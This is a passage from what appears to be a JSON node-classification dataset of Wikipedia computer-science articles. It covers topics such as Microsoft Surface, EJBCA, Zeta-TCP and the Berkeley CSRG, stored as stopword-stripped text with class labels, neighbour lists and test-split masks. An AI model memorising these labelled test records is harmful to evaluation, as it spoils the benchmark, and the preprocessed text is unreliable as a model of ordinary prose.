    "text": "John_C._Mitchell:john c. mitchell john clifford mitchell professor computer science courtesy electrical engineer stanford university published area programming language theory computer security john c. mitchell vice provost teaching learning stanford university mary gordon crary family professor computer science electrical engineering stanford university co-director stanford computer security lab professor courtesy education member steering committee stanford university cyber initiative mitchell vice provost stanford university since 2012 first inaugural vice provost online learning broader role teaching learning mitchell direction office vice provost teaching learning vptl advancing teaching learning faculty-driven initiatives research transforming education stanford classrooms beyond mitchell first research project online learning started 2009 six undergraduate students built stanford courseware innovative platform expanded support interactive video discussion courseware served foundation initial flipped classroom experiments stanford helped inspire first massive open online courses moocs stanford captured worldwide attention 2011 office vice provost online learning established august 2012 mitchell served john l. hennessy — stanford university 10th president — special assistant educational technology chaired faculty committee established initial priorities stanford developed intellectual property guidelines publicly released online courses help build faculty experience catalogue online material vice provost mitchell launched faculty seed grant program summer 2012 program helped faculty across campus transform stanford campus courses release public courses world generating informed discussion debate among faculty process addition supporting delivery digital course content vptl engineering team working expand features lagunita stanford instance open-source release edx platform mitchell team partnership edx announced release open edx june 2013 open-source hosting platform providing customizable alternative colleges universities supporting open educational research innovation stanford online courses generating wealth course participant data collaboration stanford centers scholarship lytics lab jointly supervised mitchell mitchell stevens candace thille graduate school education vptl playing key role evaluating educational outcomes improving online learning based data-driven research iterative design may 2014 mitchell team issued comprehensive report share benchmark information institutions higher education mitchell holds b.s stanford university m.s ph.d. massachusetts institute technology mit served editorial board ten academic journals acted consultant advisor numerous companies spent sabbaticals newton institute mathematical science coverity inc. mitchell author two books 170 research papers among most-cited scholars computer science together gordon plotkin noted connection existential types abstract data types mitchell early computer science research focused programming analysis design played pivotal role developing type theory foundation programming languages view dominant field past 15 years research focused computer security developing analysis methods improving network protocol security authorization access control web security privacy mitchell forefront web network security research education decade helped train thousands students programming languages hundreds expert-level professionals area cyber-security efforts resulted development concepts used popular java programming language improved security widely used wireless networking protocols contributed security architecture chrome browser components modern web august 2012 mitchell appointed stanford president john l. hennessy vice provost online learning newly created position responsible overseeing stanford online learning initiatives",
    "neighbors": [
      6306,
      8262,
      1783,
      10031,
      6160,
      5585,
      3767,
      3643,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1831,
    "label": 7,
    "text": "Talygen_Business_Intelligence:talygen business intelligence talygen business intelligence officially talygen inc. software development company palo alto known eponymous web based business automation software first gained publicity january 2014 pc magazine included list top ten tools small biz ces 2014 idea behind software product described charming frankfurter allgemeine talygen business intelligence company flagship product software tool draws cloud technology perform customer relationship management expense accounting manage leave sic many administrative issues enterprises",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 1832,
    "label": 2,
    "text": "Microsoft_Surface:microsoft surface microsoft surface series touchscreen-based personal computers interactive whiteboards running microsoft windows operating system designed developed microsoft devices manufactured pegatron designed premium devices set examples windows oems comprises six generations hybrid tablets 2-in-1 detachable notebooks convertible desktop all-in-one interactive whiteboard various accessories unique form factors exception first-generation surface surface 2 surface pcs use intel processors compatible microsoft windows 10 operating system surface family features six main lines devices microsoft first announced surface event june 18 2012 presented former ceo steve ballmer milk studios los angeles surface first major initiative microsoft integrate windows operating system hardware first pc designed distributed solely microsoft first surface device surface line marketed surface windows rt time announced steven sinofsky former president windows windows live second surface line based intel architecture spearheaded surface pro marketed surface windows 8 pro time demoed michael angiulo corporate vp sinofsky initially stated pricing first surface would comparable arm devices pricing surface pro would comparable current ultrabooks later ballmer noted sweet spot bulk pc market 300 800 microsoft revealed pricing began accepting preorders 2012 surface tablet october 16 2012 delivery 10/26 device launched alongside general availability windows 8 october 26 2012 surface pro became available following year february 9 2013 devices initially available microsoft stores retail online availability later expanded vendors november 2012 ballmer described distribution approach surface modest november 29 year microsoft revealed pricing 64 gb 128 gb versions surface windows 8 pro tablet would go sale february 9 2013 united states canada launch event set held february 8 2013 cancelled last minute due february 2013 nor'easter 128gb version tablet sold day release though less demand 64gb version much smaller available storage capacity supplies lower cost unit almost tight september 23 2013 microsoft announced surface 2 surface pro 2 feature hardware software updates original surface 2 launched october 22 2013 alongside surface pro 2 four days general availability windows 8.1 later microsoft launched variation surface 2 lte connectivity network march 18 2014 microsoft announced redesigned surface pro 3 may 20 2014 went sale june 20 2014 following year march 30 2015 announced surface 3 compact version surface pro 3 september 8 2015 microsoft announced surface enterprise initiative partnership accenture avanade dell inc. hp enable customers enjoy benefits windows 10 part partnership dell resell surface pro products business enterprise channels offer existing enterprise services including pro support warranty configuration deployment surface pro devices sells microsoft announced next generation surface pro 4 new surface book hybrid laptop microsoft october 2015 event new york october 10 2015 microsoft began shipping surface hub devices march 25 2016 june 2016 microsoft confirmed production surface 3 would stop december year replacement product announced reports suggest may consequence intel discontinuing broxton iteration atom processor october 26 2016 microsoft event surface studio surface book performance base announced wheel accessory surface dial announced well became available november 10 2016 immediately following announcement surface laptop microsoftedu event may 2 2017 microsoft build 2017 developer conference microsoft announced fifth-generation surface pro special event shanghai may 23 2017 october 17 2017 microsoft announced surface book 2 adding 15 model line updating internal components may 15 2018 microsoft announced surface hub 2 featuring new rotating hinge ability link multiple hubs together june 2018 microsoft announced surface go 400 surface tablet 10-inch screen 64 128 gb storage first two generations surface lines features 10.6 cleartype full hd display 16:9 aspect ratio release third generation surface surface pro microsoft increased screen sizes respectively 3:2 aspect ratio designed comfort use portrait orientation fourth generation increased screen screens feature multi-touch technology 10 touch-points scratch-resistance gorilla glass generations surface pro third generation surface also features active pen included box models display responds sensors ambient light sensor adjust screen brightness 3-axis accelerometer sense surface orientation switch portrait landscape orientation modes surface built-in applications support screen rotation four directions including upside-down three buttons first three generation surface including capacitive windows button near display opens start screen two physical buttons sides power volume fourth generation removed capacitive windows button screen surface front rear cameras resolution increased 3.5/8 5/5 megapixels latest generation surface surface pro respectively first generation surface uses quad-core nvidia tegra 3 arm architecture opposed intel x64 architecture therefore shipped windows rt written arm architecture second generation surface 2 added nvidia tegra 4 architecture limited surface surface 2 apps windows store recompiled arm release surface 3 microsoft switched surface line intel x64 architecture architecture found surface pro line surface 3 uses braswell atom x7 processor surface pro line microsoft uses intel x64 architecture run software designed microsoft windows surface pro surface pro 2 one processor variant core i5 though surface pro runs ivy bridge iteration surface pro 2 runs haswell iteration surface pro 3 added haswell core i3 core i7 variants surface devices released six internal storage capacities 32 64 128 256 512 gb 1 tb release third generation 32 gb model discontinued models also feature microsdxc card slot located behind kickstand allow use memory cards 200 gb surface devices different amount non-replaceable ram ranging 2 32 gb attached motherboard left right side surface tablet full-size usb port mini displayport micro-hdmi port older models magnetic charging port micro-usb charging port surface 3 surface devices 3.5mm headphone/microphone jack devices feature accessory spine cover port along bottom changed dimensions ports moved different locations throughout various generations surface tablets beginning surface pro 3 microsoft moved fin-style connector called surface connect charge device surface devices come wi-fi models generations also feature wi-fi cellular support cellular variants however support circuit-switched voice calls texts allowing data connectivity cellular models micro-sim slot bottom device next type cover connecting pins exterior earlier generations surface 2012 tablet pro pro 2 made vapormg magnesium alloy giving semi-glossy black durable finish microsoft calls dark titanium originally design surface feature full vapormg design production models ditched went vapormg coating later devices moved towards matte gray finish showing actual magnesium color semi-transparent top coating surface laptop available four colors platinum graphite gold burgundy cobalt blue surface surface pro lines feature kickstand flips back device prop allowing device stood angle hands-free according microsoft great watching movies video chatting typing documents according reviewers kickstand uncomfortable use one lap means device wo n't fit shallow desks first generation kickstand set 22 degrees angle position second generation added 55 degrees angle position according microsoft makes device comfortable type lap surface 3 features three angle positions 22 44 60 degrees surface pro 3 first device continuous kickstand set angles 22 150 degrees fifth-generation surface pro microsoft added additional 15 degrees rotation hinge bringing widest possible angle 165 degrees microsoft calls studio mode october 6 2015 microsoft unveiled surface book 2-in-1 detachable mechanically attached durable hardware keyboard became first surface device marketed laptop instead tablet device teardrop design surface book microsoft calls dynamic fulcrum hinge allows device support heavier notebook/screen portion surface studio uses zero-gravity hinge placed multiple angles standing drafting table position 20 degrees another unique aspect surface book available discrete graphics adapter contained keyboard module module detached surface book running case system automatically switches integrated graphics tablet unit october 26 2016 microsoft unveiled additional configuration called surface book performance base upgraded processor longer battery life second generation surface book 2 announced october 17 2017 introducing upgraded ceramic hinge stability lighter overall weight distribution 15-inch model added line may 3 2017 microsoft unveiled surface laptop non-detachable version surface book claiming thinnest touch-enabled lcd panel kind permanently attached hardware keyboard comes four colors uses kind fabric type cover accessories tablets device comes newly announced windows 10 operating system enables faster boot times expense ability download install programs web instead microsoft store users switch fully enabled version windows 10 free october 26 2016 microsoft announced 28-inch all-in-one desktop pc surface studio device claims thinnest lcd ever made all-in-one pc components including processor surround-sound system located compact base screen mounted upon via flexible four-point hinge design allows screen fold 20-degree angle physical interaction user comes windows 10 anniversary update preinstalled optimized windows 10 creators update released april 2017 january 21 2015 microsoft introduced new device category surface family surface hub 84-inch 120 hz 4k 55-inch 1080p multi-touch multi-pen wall-mounted all-in-one device aimed collaboration videoconferencing use businesses device runs variant windows 10 operating system surface devices except surface surface 2 models sold since july 29 2015 ship windows 10 operating system also july 2016 older models shipped windows 8.1 eligible free upgrade windows 10 original surface surface 2 models use windows rt special version windows 8 designed devices arm processors upgraded windows 10 however several major updates made available initial release include windows rt 8.1 rt 8.1 update 1 rt 8.1 august update rt 8.1 update 3 older arm-based models surface compatible windows 10 received several new features including new start menu similar found early preview builds windows 10 surface pro 4 onward surface devices support windows hello facial biometric authentication box cameras ir-sensors surface pro 3 utilize surface pro 4 type cover fingerprint id gain windows hello support windows 10 user interface two modes desktop mode tablet mode keyboard connected surface windows 10 runs desktop mode absent windows 10 runs tablet mode running tablet mode start menu apps run full screen running apps hidden taskbar back button appears swiping top closes app swiping left evokes task view swiping right evokes action center several included apps updated windows 10 mail people camera calendar microsoft edge xbox app onenote photos voice recorder phone companion calculator scan alarms clock microsoft store apps include maps movies tv groove music microsoft solitaire collection msn apps money news weather sports surface devices come preloaded onenote app taking handwritten notes windows 10 also features text input panel handwriting recognition automatically converts handwriting text microsoft edge browser features inking function allows handwritten annotations directly webpages microsoft ported office suite use windows 10 devices including surface devices running windows 10 screen size devices exceed 10 inches apps require office 365 subscription edit documents although needed view print surface devices internal microphone speakers optimized cortana personal assistant feature included windows 10 devices third-party applications designed pen touch interaction surface mind include drawboard pdf sketchable prior release windows 10 surface pro 3 microsoft made surface hub app available allowed adjustment pen pressure sensitivity button functions surface hub app renamed surface following launch surface hub device additionally toggles control sound quality disable capacitive windows button surface 3 pro 3 devices included surface pro 3 surface pen based n-trig technology microsoft added capability launch onenote lock screen without logging pressing purple button top pen microsoft added sections windows 10 settings ability control functions buttons surface pen one function launch onenote press top button surface pro 4 pen introduction surface dial microsoft added wheel settings section settings app windows 10 devices windows 10 anniversary update added ability adjust shortcuts pen buttons performed microsoft offer several surface accessories bluetooth connected devices among surface pen keyboard covers surface dial two main versions keyboard covers connect via accessory spine surface tablets discontinued touch cover ever-evolving type cover feature multi-touch trackpad full qwerty keyboard pre-defined action keys place function row though function row still accessible via function button covers made various soft-touch materials connect surface polycarbonate spine pogo pins microsoft sells surface pen active-digitzer pen separate surface included surface tablets fifth-generation surface pro removed surface pen designed integrate inking capabilities windows including onenote windows ink workspace surface dial introduced alongside surface studio computer wheel designed work on-screen surface studio fifth-generation surface pro previous surface pro devices updated support well 2013 microsoft announced going design covers surface accessory spine code named blades based touch cover 2 sensors product shipped surface music cover surface music kit app october 2012 microsoft aired first commercial directed jon chu surface product line first 30-second commercial surface movement focus windows rt version first generation surface detachable keyboard kickstand first aired dancing stars commercial break 2014 microsoft announced five-year 400 million deal national football league surface became official tablet computer brand nfl part partnership special ruggedized surface pro 2 devices issued teams use sidelines allowing coaches players view annotate footage previous plays partnership initially hampered television commentators erroneously referred devices ipad several occasions microsoft since stated coached commentators properly referring devices on-air january 11 2016 microsoft announced collaboration pow wow includes group artists around world utilizes various surface devices surface pro 4 surface book create total 17 murals artists filmed using surface devices explain integrate surface workflow final products posted youtube accompanies post microsoft devices blog february 17 2016 microsoft announced alongside us department defense plans upgrade windows 10 approved surface devices certified use defense information systems agency unified capabilities approved products list surface book surface pro 4 surface pro 3 surface 3 approved multifunction mobile devices thus meeting necessary requirements security compatibility systems reviews first-generation surface rt critics ranged broadly hardware received mostly positive reviews software overall experience mixed wired reviewer mathew honan stated one exciting pieces hardware ’ ever used extremely well-designed meticulous even tablets likely confuse many microsoft ’ longtime customers techcrunch matt buchanan buzzfeed gizmodo recommended purchasing tablet gizmodo mentioned issues high price tag described similar inferior ipad also praised hardware saying 'll appreciate every time pick turn simple joyful experience david pogue new york times praised hardware criticized software verge described technology fulfilling role laptop tablet half well devices market adding whole thing honestly perplexing warner crocker got ta mobile described frustratingly confusing farhad manjoo slate noted shortcomings puzzling given much time microsoft spent developing device neil mcallister noted lack compelling case switch ipad windows rt device price point apple already strong network effect app developers windows developers ported offerings arm processor surface rt worse battery life similar devices first-generation surface pro shorter battery life original arm-based surface due part full hd screen intel core i5 processor surface pro 3 received positive reviewers david pogue suggested upshot hardly thickness weight penalty kickstand type cover let transform 1.8-pound tablet actual fast luxury laptop pogue said surface pro 3 form factor works well tablet contrast surface pro 2 whose bulk weight limited appeal tablet pogue also stated new multi-stage kickstand 3:2 screen aspect ratio new type cover 3 detachable keyboard made competent laptop another advantage surface pro 3 considered tablet faa tsa despite hardware makes capable running x86 windows programs advantageous air travel since tablet used takeoff landing tablet left bag going tsa scanner machine neither apply laptop suggested surface pro 3 comes closest microsoft tablet pc concept company founder bill gates announced 2001 first surface become credible laptop replacement time magazine included microsoft surface pro 3 list 25 best inventions 2014 surface 3 non-pro received generally positive reviews computer critics praised microsoft shift arm architecture toward x86 therefore windows rt regular windows os noted well designed chassis accessories produced quality materials overall premium feeling use less powerful surface 3 lighter cheaper alternative surface pro 3 importantly surface 3 could compete high-end android ipad tablets advantage device running full desktop os instead mobile os similar price reviewers also note 37 gb total storage space low-end surface 3 available user close competitor low-end ipad air 2 12.5 gb user-available storage space price common downsides relatively low battery life slower performance compared devices intel core processors high price since accessories like surface pen type cover included surface first announced critics noted device represented significant departure microsoft company previously relied exclusively third-party oems produce devices running windows began shifting towards first-party hardware model similarities apple steve ballmer said like xbox surface example sort hardware products microsoft release future original equipment manufacturers oems whose products traditionally run microsoft operating systems positive responses release surface hp lenovo samsung dell applauded microsoft decision create tablet pc said relationships microsoft changed john solomon senior vice president hp said microsoft basically making leadership statement showing possible tablet space acer founder stan shih said believed microsoft introduced hardware order establish market would withdraw favor oems however others believe oems left sidelined perception microsoft new tablet would replace products acer chairman jt wang advised microsoft please think twice microsoft acknowledged surface may affect commitment partners windows platform need surface market arm-compatible version windows questioned analysts recent developments pc industry intel amd introduced x86-based system-on-chip designs windows 8 atom clover trail temash respectively response growing competition arm licensees particular intel claimed clover trail-based tablets could provide battery life rivaling arm devices test pc world samsung clover trail-based ativ smart pc shown battery life exceeding first gen arm-based surface peter bright ars technica argued windows rt clear purpose since power advantage arm-based devices nowhere near clear-cut two years ago users would better purchasing office 2013 removed features licensing restrictions office rt sales first generation surface meet microsoft expectations led price reductions sales incentives march 2013 bloomberg reported inside sources surface sales behind expectations particularly arm-based surface model microsoft originally projected sales 2 million surface units final quarter 2012 total 1.5 million surface devices sold since launch surface pro accounting 400,000 sales expensive surface pro intel cpu makes full-fledged windows laptop pc despite compromises successful compared oems first-generation windows 8 ultrabook hybrids larger and/or expensive july 2013 steve ballmer revealed surface n't sold well hoped reported microsoft made loss due lackluster surface sales concurrently microsoft cut price first-gen surface rt worldwide 30 u.s. price falling followed price cut august revealed even marketing costs exceed sales august 4 2013 cost surface pro cut 100 giving entry price 799 several law firms sued microsoft accusing company misleading shareholders sales first-gen arm based surface tablet calling unmitigated disaster first two years sales microsoft lost almost two billion dollars poor sales arm-based surface tablet credited continuing market dominance microsoft competitors tablet market particularly apple ipad retained dominance due app store offering tablet-optimized applications oems opted produce tablets running google android came wide variety sizes prices albeit mixed success among oems google play second-largest selection tablet applications contrast limited amount software designed specifically surface operating system windows rt selection even weaker windows phone indeed oems reported customers felt intel-based tablets appropriate use business environments compatible much widely available x86 programs windows rt microsoft subsequent efforts focused upon refining surface pro making viable competitor premium ultra-mobile pc category ultrabooks macbook air discontinuing development arm-powered surface devices surface 3 non-pro intel x86 cpu albeit lower performance surface pro 3 resultant surface pro 3 succeeded garnering great interest surface line making surface business profitable first time fiscal year q1 2015 later q2 surface division sales topped 1 billion surface division scored 888 million q4 2015 despite overall loss 2.1 billion microsoft 117 year-over-year growth thanks steady commercial performance surface pro 3 launch mainstream model surface 3 first quarter fiscal year 2018 surface division posted best earnings performance date users microsoft support forum reported touch covers splitting seam connects tablet exposing wiring microsoft spokesperson stated company aware issue would offer free replacements affected defect users reported issues audio randomly stuttering muting surface tablet use wi-fi connectivity issues also reported firmware updates attempted fix problem released users still reported problems like blue screen errors watching video crash display driver microsoft acknowledged bug windows key always work promised fix latest update promised fix issue able fix original surface pro microsoft acknowledged issues encountered users stylus pen including intermittent pen failures older applications complete pen support due different apis used surface pro stylus drivers latter case microsoft indicated working software vendors ensure better compatibility later models beginning surface pro 3 n-trig digital pen digitizer system attained high pen compatibility older applications thanks regularly updated optional wintab driver issues also experienced slow wi-fi connectivity device properly returning standby ifixit awarded surface pro worst ever repairability rating ceo kyle wiens claims due incompetence rather deliberate design choices",
    "neighbors": [
      3586,
      6150,
      5649,
      3605,
      5666,
      7215,
      2101,
      8757,
      10303,
      582,
      2635,
      9812,
      4704,
      10338,
      617,
      7796,
      6265,
      6797,
      10388,
      10900,
      3224,
      7838,
      6827,
      7354,
      2237,
      7359,
      4289,
      194,
      10957,
      4816,
      740,
      4326,
      3304,
      9448,
      5356,
      9964,
      1776,
      259,
      4356,
      11524,
      5384,
      782,
      4886,
      11030,
      9498,
      11549,
      7456,
      7970,
      3875,
      11559,
      6441,
      7983,
      3890,
      11060,
      9022,
      5444,
      9033,
      6476,
      2383,
      11605,
      1366,
      4439,
      11103,
      2919,
      4465,
      9585,
      1400,
      1916,
      6539,
      1935,
      929,
      6575,
      3527,
      4051,
      11221,
      8662,
      10207,
      1000,
      8681,
      10734,
      499
    ],
    "mask": "None"
  },
  {
    "node_id": 1833,
    "label": 2,
    "text": "MOAP:moap moap mobile oriented applications platform software platform ntt docomo foma service mobile phones two versions moap",
    "neighbors": [
      7938,
      6276,
      7812,
      8326,
      11271,
      4360,
      4493,
      2195,
      11155,
      1813,
      7063,
      11545,
      10780,
      1694,
      3618,
      8355,
      4132,
      5290,
      4011,
      9646,
      9137,
      10674,
      10802,
      823,
      9660,
      1216,
      5824,
      7617,
      10817,
      10053,
      199,
      5067,
      7246,
      8147,
      6748,
      1761,
      9443,
      4841,
      6505
    ],
    "mask": "None"
  },
  {
    "node_id": 1834,
    "label": 5,
    "text": "Lunascape:lunascape lunascape web browser developed lunascape corporation tokyo japan unusual contains three rendering engines gecko used mozilla firefox webkit used apple safari trident used microsoft internet explorer feature common avant web browser user switch layout engines seamlessly lunascape available windows android platforms well ipad iphone lunascape released october 2001 founders college browser became popular hidekazu kondo established lunascape corporation august 2004 pursuing phd hidekazu kondo became ceo lunascape corporation additionally lunascape selected exploratory software project commissioned japanese government company branched united states june 2008 based sunnyvale california lunascape introduced browser internationally december 2008",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      5205,
      6231,
      8281,
      6747,
      6237,
      1642,
      9834,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      11418,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      9451,
      11000,
      8443,
      9987,
      7943,
      278,
      7965,
      7983,
      7488,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      4490,
      6028,
      10126,
      7572,
      5026,
      4013,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 1835,
    "label": 5,
    "text": "Zeta-TCP:zeta-tcp zeta-tcp refers set proprietary transmission control protocol tcp algorithms targeted improve end-to-end performance tcp regardless whether peer zeta-tcp tcp protocol stack words compatible existing tcp algorithms designed implemented appex networks corporation zeta-tcp offers following improvements primarily tcp stack implementations today use tcp new reno variations tcp sack rfc3517 congestion avoidance algorithm new reno-based algorithms loss-based loss-based algorithms treat packet losses sole indication congestions network internet since evolved assumption often overkill today congestion loss constantly descending advancement technologies relatively random loss due properties media e.g. wireless/fading channels wireline noises/cross-talk connectivity flaws software bugs etc. increasing congestion detected false-alarmed new reno shrinks congestion window cwnd sharply causing plunge sending rate one major reasons tcp based applications often barely able utilize fraction subscribed bandwidth today especially rtt large tcp vegas variations notably fast tcp base congestion prodications rtt measurement latency-based algorithms overcome problems loss-based ones usually realistic reflection congestions network latency-based algorithms limitations zeta-tcp attempts tackle problem combining strength latency-based loss-based algorithms constantly measures rtt variation loss rate variation calculates likelihood congestions different cwnd backoff schemes applied based likelihood level highest level applies backoff scheme new reno already proven effective stable many years massive deployment packet losses real network environment rarely spread evenly rather tend happen close tcp related rfcs new reno sack etc explicitly defined first loss detected high confidence however detection losses tcp enters fast recovery mode sack permitted efficient rfc3517 popular operating systems implementations equally suboptimal zeta-tcp introduced simple effective algorithm calculate loss probability every unack'd/unsack 'd packet packet retransmitted loss probability surpassed certain threshold rule applies retransmission decision every packet therefore zeta-tcp able minimize number retransmitted packets improving bandwidth utilization lab tests also confirmed zeta-tcp retransmitted much fewer packets tcp implementations loss rate zeta-tcp also developed mechanism accurately detect packet loss earliest possible time suspects loss likely happen early-detection usually save rtt two retransmission algorithms focus accelerating outgoing traffic reverse control attempts address incoming issues reverse control monitors quality connections inbound data executes algorithm hint peer transmit fast connection quality good algorithm also makes good effort accurately identify real packet losses abnormal situations order avoid triggering unnecessary fast recoveries reverse-controlled inbound acceleration heuristic inbound speed really controlled sender i.e. peer hint peer send faster tcp stacks take hint others n't also quite often sender side content server instance rate limiting mechanism acceleration effect capped addition acceleration reverse control also limit inbound rate unlike acceleration putting brake inbound traffic effective accurate tcp flow control mechanism inbound rate limiting zeta-tcp lays foundation inbound flow control appex ipeq time writing zeta-tcp implemented software modules linux netfilter kernel module microsoft windows 10 xp related windows server versions ndis im filter/ndis lwf wince appex chose modify protocol stack intercept tcp flows apply algorithms on-the-fly nonintrusive way implement algorithms intended wider acceptance drawback added overhead processing reality overhead negligible comparison performance gains",
    "neighbors": [
      7017,
      10924,
      112,
      6524,
      9021,
      10079
    ],
    "mask": "None"
  },
  {
    "node_id": 1836,
    "label": 4,
    "text": "EJBCA:ejbca ejbca free software public key infrastructure pki certificate authority software package maintained sponsored swedish for-profit company primekey solutions ab holds copyright codebase project source code available terms lesser gnu general public license system implemented java ee designed platform independent fully clusterable permit greater degree scalability typical similar software packages multiple instances ejbca run simultaneously sharing database containing current certificate authorities cas permits instance software access ca software also supports use hardware security module hsm provides additional security larger-scale installations would use multiple instances ejbca running cluster fully distributed database separate cluster third cluster hsms keeping different ca keys ejbca supports many common pki architectures single server distributed ras external validation authority example architecture illustrated ejbca supports running unlimited number cas levels cas single installation build complete infrastructure several within one instance ejbca certificate validation choice using x.509 crls ocsp rfc6960 ejbca software includes separate registration authority ra front end run instance ca distributed external ras communication ca ra using outgoing network connections insulate ca less trusted networks ra typically placed use common uncommon algorithms pki rsa ecdsa dsa sha-1 sha-2 compliant nsa suite b cryptography ejbca support x.509v3 certificates card verifiable certificates cvc bsi tr-03110 certificates compliant standards rfc5280 ca/browser forum eidas icao 9303 eac 2.10 iso 18013 amendment 2 edl using standard pkcs 11 api use pkcs 11 compliant hsms protect cas ’ ocsp responders ’ private keys ejbca designed integration mind standard protocols supported cmp scep est acme well web services using integration apis possible integrate ejbca certificate factory exposing native user interfaces build pki capacity issuing billions certificates rate several hundreds per second",
    "neighbors": [
      513,
      517,
      3560,
      5834,
      5612,
      5677,
      7983,
      5200,
      7985,
      10831,
      11387,
      7231
    ],
    "mask": "None"
  },
  {
    "node_id": 1837,
    "label": 9,
    "text": "ActivePerl:activeperl activeperl distribution perl activestate formerly part sophos windows macos linux solaris aix hp-ux main editions available including community free development use several paid tiers enterprise includes support oem licensing includes version perl package manager ppm installing packages cpan etc windows version includes active scripting component windows script host wsh called perlscript isapi module embedding within internet information services iis perlscript initially solely activex scripting engine produced company activestate use microsoft internet information services iis allows programmers use perl-based code addition place vbscript jscript context web servers running asp protocol subsequently apache :asp created apache web server allows coding perl neither vbscript jscript perlscript also used write windows script host-based programs similar vbscript standalone perlscripts executed created file extension .pls case require enclosing xml e.g .pls files gain access drag drop wsh functionality perlscripts extension wsf require xml tags specify job id script language e.g wsf perlscripts gain access wsh drag drop functionality similarly perl droplets now-obsolete macperl wsh objects available via implicitly created wscript object",
    "neighbors": [
      5249,
      8582,
      6797,
      3988,
      1304,
      11683,
      6313,
      10026,
      4398,
      4658,
      9014,
      823,
      4294,
      9808,
      7764,
      4439,
      603,
      7518,
      479,
      9055,
      865,
      11492,
      2281,
      8941
    ],
    "mask": "Test"
  },
  {
    "node_id": 1838,
    "label": 4,
    "text": "Director_of_the_National_Security_Agency:director national security agency director national security agency dirnsa highest-ranking official national security agency defense agency within u.s. department defense director nsa also concurrently serves chief central security service chcss commander u.s. cyber command uscybercom dirnsa/chcss officeholder reports secretary defense intelligence cdruscybercom secretary defense according united states code director nsa recommended secretary defense nominated appointment president nominee must confirmed via majority vote senate accordance department defense directive 5100.20 dated 23 december 1971 director nsa must always commissioned officer military services assignment currently part tri-hatted position director nsa appointed grade four-star general admiral period incumbency deputy director always technically experienced civilian armed forces security agency predecessor national security agency existed 1949 1952",
    "neighbors": [
      6017,
      1930,
      6668,
      8726,
      1189,
      9517,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      2275,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 1839,
    "label": 2,
    "text": "Computer_Systems_Research_Group:computer systems research group computer systems research group csrg research group university california berkeley dedicated enhancing unix operating system funded defense advanced research projects agency professor bob fabry berkeley acquired unix source license 1974 group started modify unix distributed version berkeley software distribution bsd april 1980 fabry signed contract darpa develop unix even accommodate specific requirements arpanet funding fabry created computer systems research group berkeley sockets api berkeley fast file system group significant innovations sockets interface solved problem supporting multiple protocols e.g xns tcp/ip extended unix everything file notion network protocols fast file system increased block allocation size 512 bytes 4096 bytes larger improving disk transfer performance also allowing micro-blocks small 128 bytes improved disk utilization another noteworthy contribution job control signals allowed user suspend job key-press control-z continue running job background c shell noteworthy versions bsd 3.0 bsd first version bsd support virtual memory 4.0 bsd included job-control ctrl-z functionality suspend restart running job special 4.15 interim bsd version released using bbn tcp/ip 4.2 bsd included full tcp/ip stack ffs nfs support early 1980s csrg best-known non-commercial unix developer majority unix sites used least berkeley software included csrg work unix system v. 1970s 1980s t/usl raised commercial licensing fee unix 20,000 100,000– 200,000 became big problem small research labs companies used bsd csrg decided replace source code originated succeeded 1994 n't agree took berkeley court settlement 1994 csrg distributed last versions called 4.4bsd-lite bsd-licensed 4.4bsd-encumbered unix-licensed group disbanded 1995 leaving significant legacy freebsd openbsd netbsd dragonfly bsd based 4.4bsd-lite distribution continue play important role open-source unix community today including dictating style c programming used via knf style man page alongside free software foundation linux csrg laid foundations open source community former members include keith bostic bill joy marshall kirk mckusick samuel j leffler michael j. karels among others corporations sun microsystems berkeley software design sleepycat software later acquired oracle considered spin-off companies csrg berkeley software design led robert kolstad led development bsd unix supercomputers convex computer mach kernel",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      7561,
      7307,
      10761,
      2061,
      9743,
      8725,
      2584,
      5534,
      11297,
      1316,
      684,
      4908,
      7983,
      2994,
      1718,
      823,
      1080,
      5815,
      8504,
      9151,
      9153,
      9665,
      3651,
      7748,
      10436,
      9927,
      8395,
      5710,
      5969,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      9320,
      873,
      9452,
      5492,
      633,
      8316,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1840,
    "label": 7,
    "text": "Zettagrid:zettagrid zettagrid pty ltd australian based public cloud computing provider offer infrastructure service iaas backup baas disaster recovery draas services company management architecture applications development divisions operate perth western australia sales offices sydney jakarta zettagrid launched may 2010 offering vmware vsphere virtual private server hosting perth western australia july 2011 zettagrid launched virtual data centre service based upon vmware vcloud amazon web services rackspace microsoft azure macquarie telecom telstra optus",
    "neighbors": [
      4194,
      3819,
      4429,
      1935,
      6703,
      7248,
      6514,
      9682,
      11097
    ],
    "mask": "Test"
  },
  {
    "node_id": 1841,
    "label": 9,
    "text": "Control_table:control table control tables tables control control flow play major part program control rigid rules structure content control table—its qualifying attribute ability direct control flow way execution processor interpreter design tables sometimes referred table-driven design although typically refers generating code automatically external tables rather direct run-time tables cases control tables specific implementations finite-state-machine-based automata-based programming several hierarchical levels control table may behave manner equivalent uml state machines control tables often equivalent conditional expressions function references embedded usually implied relative column position association list control tables reduce need programming similar structures program statements two-dimensional nature tables makes easier view update one-dimensional nature program code cases non-programmers assigned maintain control tables tables multiple dimensions fixed variable lengths usually portable computer platforms requiring change interpreter algorithm logic essentially embodied within table structure content structure table may similar multimap associative array data value combination data values may mapped one functions performed perhaps simplest implementation control table may sometimes one-dimensional table directly translating raw data value corresponding subroutine offset index pointer using raw data value either directly index array performing basic arithmetic data beforehand achieved constant time without linear search binary search using typical lookup table associative array architectures accomplished two three machine instructions without comparisons loops technique known trivial hash function used specifically branch tables double dispatch feasible range possible values data needs small e.g 